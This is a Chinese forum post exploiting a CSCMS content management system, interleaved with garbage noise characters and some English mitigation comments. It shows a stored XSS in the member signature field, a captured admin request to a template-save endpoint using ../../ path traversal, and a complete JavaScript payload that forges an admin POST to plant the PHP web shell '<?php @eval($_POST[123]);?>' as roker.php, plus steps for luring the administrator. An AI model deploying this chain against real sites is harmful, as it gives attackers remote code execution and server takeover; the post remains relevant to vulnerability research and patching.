这个 CMS 以前 90 有人发了个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下了源码。
因为后台登入还需要认证码，所以注入就没看了。
存在 XSS。
漏洞文件 user/member/skin_edit.php
7 N. ?/ g Z9 {% y本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
& Q$ g/ H' D3 Z: `6 x 5 E$ Q) B! }+ {' C2 Q7 A; q/ o
<?php /* Fragment of user/member/skin_edit.php as quoted in the post (forum noise left in place).
   $cscms_qianm — the stored signature — is echoed straight into the <textarea> with no encoding,
   so a value containing </textarea> breaks out into page markup and any script in it runs in the
   viewer's browser. Output-side fix: echo htmlspecialchars($cscms_qianm, ENT_QUOTES); here (and
   anywhere else the signature is rendered). */ ?>
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>6 i" j0 y9 H. B8 N# M5 z. O: C3 s
! |- i, ]% B" R5 w2 |. n; [</textarea></td></tr>+ h- p! x v2 L% T! R
user/do.php：
if($op=='zl'){ //资料 — profile-update branch of user/do.php as quoted in the post; its closing brace is not part of the excerpt
7 T* [" I$ R& T/ e* a8 i , E- Y7 p# O1 n) p
// Presence check only: no length, character-set or markup validation on any field.
// $CS_Qianm (signature) is presumably populated from the request (the source is not shown)
// and is stored verbatim; skin_edit.php later echoes it into a <textarea> unencoded, which is
// the stored XSS the post describes. Mitigation: encode on output (htmlspecialchars with
// ENT_QUOTES) and, for a plain-text signature, strip or reject markup on input.
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
; H, s8 t1 L$ H2 T8 G3 t. d# _ exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
+ ]( M) P- t- ] 4 m' a' Q2 |6 B1 [
// The UPDATE is assembled by string concatenation of request-derived values. Whether a global
// quoting step (e.g. addslashes / magic_quotes) runs before this point is not visible in the
// excerpt — the post says injection was not examined. A prepared statement with bound
// parameters would settle the question regardless of that step.
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."'," L/ r$ c5 j: N' m ^' a. G5 w
$ L6 S0 s' p3 l. [7 | CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."' v |, u6 r8 V4 i
where CS_Name='".$cscms_name."'";
, A @9 i+ N# B% ?4 O" T , ~6 `# s& I9 e
// Success/failure is reported by redirecting back; neither branch encodes the stored value.
if($db->query($sql)){
' U& t' \) I* Z8 ~0 H$ ? ' V- C! y7 J: N/ l
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));7 H* O4 q! ^% i3 T+ t
0 H/ A* b$ n+ R8 v1 U
}else{/ t. `/ V$ I* X
/ X' {0 W- U4 M. }: N, K$ d
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));# F1 S; E. p, q# f' t
+ f& ^4 y% i2 q( F- G! y3 Q
}
签名字段 CS_Qianm 没有过滤，直接入库并在 skin_edit.php 原样输出，导致存储型 XSS。
后台看了下，很奇葩的是可以写任意格式的文件。
抓包如下。
1 p8 Z R( K! A4 l d# y3 I4 ~0 ~本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
3 o9 j3 [2 z- h
4 Q1 b4 B2 S6 t9 o6 QAccept: text/html, application/xhtml+xml, */*
* I( P5 I3 d6 P. M$ c" t& W - S9 }2 _- ^6 H% n* i
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php5 H0 L: g1 ^' }% _! E+ w; i5 t
- e# K7 X. p' F/ K, L0 F2 gAccept-Language: zh-CN
t# W/ {* {" {# | # J& M/ |, g' n# b
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
7 X% a# |& M7 I; ]+ i( O) n ( O" j1 ^9 i" ]4 T1 S
Content-Type: application/x-www-form-urlencoded' E* B* r* M2 o- p# x
5 M) c/ c& _5 t' j) G3 s( J5 i
Accept-Encoding: gzip, deflate8 v5 P& r% A8 G0 T4 O0 n7 g
& q. G& e3 X0 [$ F
Host: 127.0.0.1
o2 I& s+ O1 g+ `( C- W! ^' @ $ |/ f+ C+ p" {4 s. L# W
Content-Length: 38
" t, A0 x/ x0 @2 S - y4 h( w- B7 I# W: J- F- | N6 Y
DNT: 11 x3 i6 y1 [9 R
* v4 X/ L+ t3 L( B. E
Connection: Keep-Alive
; |: ]/ R7 P8 d: q2 K. A
; C2 Z4 k8 _' RCache-Control: no-cache W6 N/ \( A2 C4 F
3 T6 u: m/ T* A# k0 {Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
& n, q* r3 G4 u5 `3 |$ H
D7 K8 a# ~! p8 V( A1 K/ g- p. W+ W; }& p$ S- ?9 B/ H
name=aaa.php&content=%3Cs%3E%3Ca%25%3E' l7 a) K: H: a$ Y; p; F
于是构造 JS 如下。
' Y8 `3 \ K8 h# A2 f$ h1 o7 s本帖隐藏的内容<script> / {' q4 ?% p! W9 K9 B4 ]7 h; `
// Payload quoted from the post, left as given (forum noise included). It only matters if an
// administrator's browser renders the injected signature, so the impact hinges on the chain
// below. Each of these server-side controls would break it on its own:
//   - encode CS_Qianm on output in skin_edit.php / the profile page, so the script never runs;
//   - require an anti-CSRF token on admin/skins/skins.php — the captured request above carries
//     only cookies and the two form fields, no token (inferred from the capture; confirm in the
//     handler);
//   - canonicalise the `path` parameter and confine it under the skins directory (the URL uses
//     ../../ traversal);
//   - whitelist template extensions for `name` so a .php file cannot be written.
thisTHost = top.location.hostname;- l! l- h. k0 o: m; o
n ?" C# |' U0 ^
// Builds the template-save URL on the victim's own host; the path parameter carries the traversal.
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
0 n% |0 Y. W( h; v
// Creates and auto-submits a hidden POST form (fields: name, content) with the admin's own
// cookies attached — a textbook CSRF vector, which is why cookie-only authentication is not
// enough for state-changing admin actions.
+ J0 L6 U' F0 l3 H$ W2 m9 u; ffunction PostSubmit(url, data, msg) { 1 N) a4 ^1 K' l: M, B' H
var postUrl = url;
) X# p+ t/ @4 w) y4 s 3 b$ v; g7 w8 |. z( h
var postData = data;
" e- c! X; R4 {6 X var msgData = msg; 3 v+ G5 Q7 g! j% h( s
var ExportForm = document.createElement("FORM");
) B1 e( P2 c1 F" V& x- M3 B5 _ document.body.appendChild(ExportForm); $ }! D% h2 C- w, {
ExportForm.method = "POST";
8 l& F* B2 a4 ^# Y- C3 n var newElement = document.createElement("input"); / m" t: m+ k5 b J7 a0 B8 G
newElement.setAttribute("name", "name"); 1 r. z4 S0 l: C7 E7 j/ I( Q
newElement.setAttribute("type", "hidden"); 9 J& {& d4 R( Q6 C( I1 h
var newElement2 = document.createElement("input");
3 M& C9 m' z7 w: o0 @6 d newElement2.setAttribute("name", "content"); 5 H/ {# A* ?" L' x Z
newElement2.setAttribute("type", "hidden");
7 q9 j9 s' `2 c5 W; k, I ExportForm.appendChild(newElement); % s' A- \) y6 u2 ], e) @
ExportForm.appendChild(newElement2); " t, n/ a9 }4 Q) y2 l7 J3 h5 s: w
newElement.value = postData; , F! T# f6 C- u$ F
newElement2.value = msgData;
; O, X2 @0 \- _6 L6 k) D- ] ExportForm.action = postUrl;
& U( g8 `9 ^6 Y' |5 p7 _ ExportForm.submit();
4 V' @* D# j- s9 B i};
% l# z" t2 V/ m / J& n/ x% {7 ^3 ?2 S" J
// Writes the PHP one-liner from the post into skins/index/html/. Detection on the defender's
// side: alert on new .php files appearing under the skins/template tree, and on template saves
// whose `name` does not end in the expected template extension.
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
: u$ S$ m/ ^2 @ D; W% F+ \( H
4 @0 `1 q& A. Z; R; H! L P/ X8 n</script>! ~% Z9 j. d2 b0 B5 D6 k
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 的修改签名处插入上面的脚本。
用你的账号给管理员写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 自己改），就会在 skins\index\html\ 目录下生成 roker.php 一句话。